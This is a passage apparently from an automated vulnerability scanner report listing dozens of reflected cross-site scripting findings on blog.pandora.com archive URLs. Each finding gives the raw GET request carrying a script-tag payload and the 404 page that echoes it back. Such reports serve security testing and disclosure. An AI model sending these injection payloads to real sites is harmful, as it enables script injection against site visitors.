The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a573a<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007a573a<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:22 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2007a573a<script>alert(1)< ...[SNIP]... |
3.104. http://blog.pandora.com/pandora/archives/2007/04/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2007/04 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 86757<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007/0486757<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:26 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2007/0486757<script>alert(1)< ...[SNIP]... |
3.105. http://blog.pandora.com/pandora/archives/2007/05/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2007/05 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d0cd0<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorad0cd0<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:08 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorad0cd0<script>alert(1)< ...[SNIP]... |
3.106. http://blog.pandora.com/pandora/archives/2007/05/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2007/05 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 590d0<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives590d0<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:11 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives590d0<script>alert(1)< ...[SNIP]... |
3.107. http://blog.pandora.com/pandora/archives/2007/05/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2007/05 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5b6bf<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20075b6bf<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:15 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20075b6bf<script>alert(1)< ...[SNIP]... |
3.108. http://blog.pandora.com/pandora/archives/2007/05/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2007/05 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b5da7<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007/05b5da7<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:21 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2007/05b5da7<script>alert(1)< ...[SNIP]... |
3.109. http://blog.pandora.com/pandora/archives/2007/06/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2007/06 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8d9ba<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora8d9ba<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:05 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora8d9ba<script>alert(1)< ...[SNIP]... |
3.110. http://blog.pandora.com/pandora/archives/2007/06/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2007/06 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c0798<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesc0798<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:08 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesc0798<script>alert(1)< ...[SNIP]... |
3.111. http://blog.pandora.com/pandora/archives/2007/06/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2007/06 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f490a<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007f490a<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:10 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2007f490a<script>alert(1)< ...[SNIP]... |
3.112. http://blog.pandora.com/pandora/archives/2007/06/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2007/06 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 82d62<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007/0682d62<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:13 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2007/0682d62<script>alert(1)< ...[SNIP]... |
3.113. http://blog.pandora.com/pandora/archives/2007/07/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2007/07 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6e10b<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora6e10b<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:11 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora6e10b<script>alert(1)< ...[SNIP]... |
3.114. http://blog.pandora.com/pandora/archives/2007/07/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2007/07 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ab862<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesab862<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:13 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesab862<script>alert(1)< ...[SNIP]... |
3.115. http://blog.pandora.com/pandora/archives/2007/07/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2007/07 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6c196<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20076c196<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:15 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20076c196<script>alert(1)< ...[SNIP]... |
3.116. http://blog.pandora.com/pandora/archives/2007/07/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2007/07 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8c182<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007/078c182<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:18 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2007/078c182<script>alert(1)< ...[SNIP]... |
3.117. http://blog.pandora.com/pandora/archives/2007/08/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2007/08 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload aeaa6<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraaeaa6<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:12 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraaeaa6<script>alert(1)< ...[SNIP]... |
3.118. http://blog.pandora.com/pandora/archives/2007/08/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2007/08 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4c8e6<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives4c8e6<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:14 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives4c8e6<script>alert(1)< ...[SNIP]... |
3.119. http://blog.pandora.com/pandora/archives/2007/08/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2007/08 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 63082<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200763082<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:17 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/200763082<script>alert(1)< ...[SNIP]... |
3.120. http://blog.pandora.com/pandora/archives/2007/08/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2007/08 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c796c<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007/08c796c<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:20 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2007/08c796c<script>alert(1)< ...[SNIP]... |
3.121. http://blog.pandora.com/pandora/archives/2007/09/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2007/09 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 20951<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora20951<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:55 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora20951<script>alert(1)< ...[SNIP]... |
3.122. http://blog.pandora.com/pandora/archives/2007/09/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2007/09 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7e680<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives7e680<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:57 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives7e680<script>alert(1)< ...[SNIP]... |
3.123. http://blog.pandora.com/pandora/archives/2007/09/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2007/09 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2c7bb<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20072c7bb<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:00 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20072c7bb<script>alert(1)< ...[SNIP]... |
3.124. http://blog.pandora.com/pandora/archives/2007/09/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2007/09 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f55fa<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007/09f55fa<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:03 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2007/09f55fa<script>alert(1)< ...[SNIP]... |
3.125. http://blog.pandora.com/pandora/archives/2007/10/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2007/10 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f9be9<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraf9be9<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:56 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraf9be9<script>alert(1)< ...[SNIP]... |
3.126. http://blog.pandora.com/pandora/archives/2007/10/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2007/10 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bafa8<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesbafa8<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:58 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesbafa8<script>alert(1)< ...[SNIP]... |
3.127. http://blog.pandora.com/pandora/archives/2007/10/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2007/10 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 18bad<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200718bad<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:01 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/200718bad<script>alert(1)< ...[SNIP]... |
3.128. http://blog.pandora.com/pandora/archives/2007/10/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2007/10 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d51e2<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007/10d51e2<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:03 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2007/10d51e2<script>alert(1)< ...[SNIP]... |
3.129. http://blog.pandora.com/pandora/archives/2007/11/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2007/11 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 17f6e<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora17f6e<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:54 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora17f6e<script>alert(1)< ...[SNIP]... |
3.130. http://blog.pandora.com/pandora/archives/2007/11/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2007/11 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a9e9a<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesa9e9a<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:56 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesa9e9a<script>alert(1)< ...[SNIP]... |
3.131. http://blog.pandora.com/pandora/archives/2007/11/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2007/11 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 76aa1<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200776aa1<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:58 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/200776aa1<script>alert(1)< ...[SNIP]... |
3.132. http://blog.pandora.com/pandora/archives/2007/11/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
